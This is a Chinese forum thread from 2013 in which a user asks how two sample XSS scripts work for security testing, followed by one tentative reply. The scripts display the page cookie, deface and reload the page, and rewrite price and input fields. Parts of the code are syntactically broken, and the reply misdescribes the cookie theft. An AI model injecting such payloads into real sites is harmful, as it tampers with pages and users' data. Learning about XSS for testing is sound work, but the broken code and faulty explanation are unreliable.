candy84528 发表于 2013-11-7 13:52:39

关于安全性测试 XXS攻击 不懂 求高手解答

<script>
setTimeout('alert("You have been owned! I will hijack your Cookie:" + document.cookie);',1000);
setTimeout("document.body.innerHTML='<font size=7> THis page have been hacked!</font>';",3000);
setTimeout("window.location.reload()",5000);
</script>


Reflected Xss Attacks

<script>
alert('THis kinda is called Reflected XSS or first-order XSS!!');
for(i=0;i<=document.getElementsByTagName("td").length-1;i++)
{
if(document.getElementsByTagName("td").innerHTML.indexof('$')>0.0)
{document.getElementByTagName("td").innerHTML='$0.0';}
};
for(i=0;i<=document.getElementByTagName("input").length-1;i++)
{
if(document.getElementByTagName("input").type=='TEXT')
{document.getElementByTagName("input").value='100000';}
}
</script>


这些是什么意思   如何用于测试呀

Miss_love 发表于 2013-11-14 08:32:29

坐等高人指点。

土土的豆豆 发表于 2013-12-11 09:46:49

XSS攻击代码用JS 来写脚本
这里给出攻击提醒文本 上3段 取了目标浏览器的cookie后返回攻击者 输入的文本消息。

下面是两段具体的代码用来替换原有的脚本:
1 验证长度>0.0的 然后统一替换成0.0
2 验证类型是TEXT 替换成100000

大致就是这个意思 具体也要熟悉JS code 然后懂具体的方法用来模拟
我说的也不一定完全正确 可以问问其他大大们意思~
页: [1]
查看完整版本: 关于安全性测试 XXS攻击 不懂 求高手解答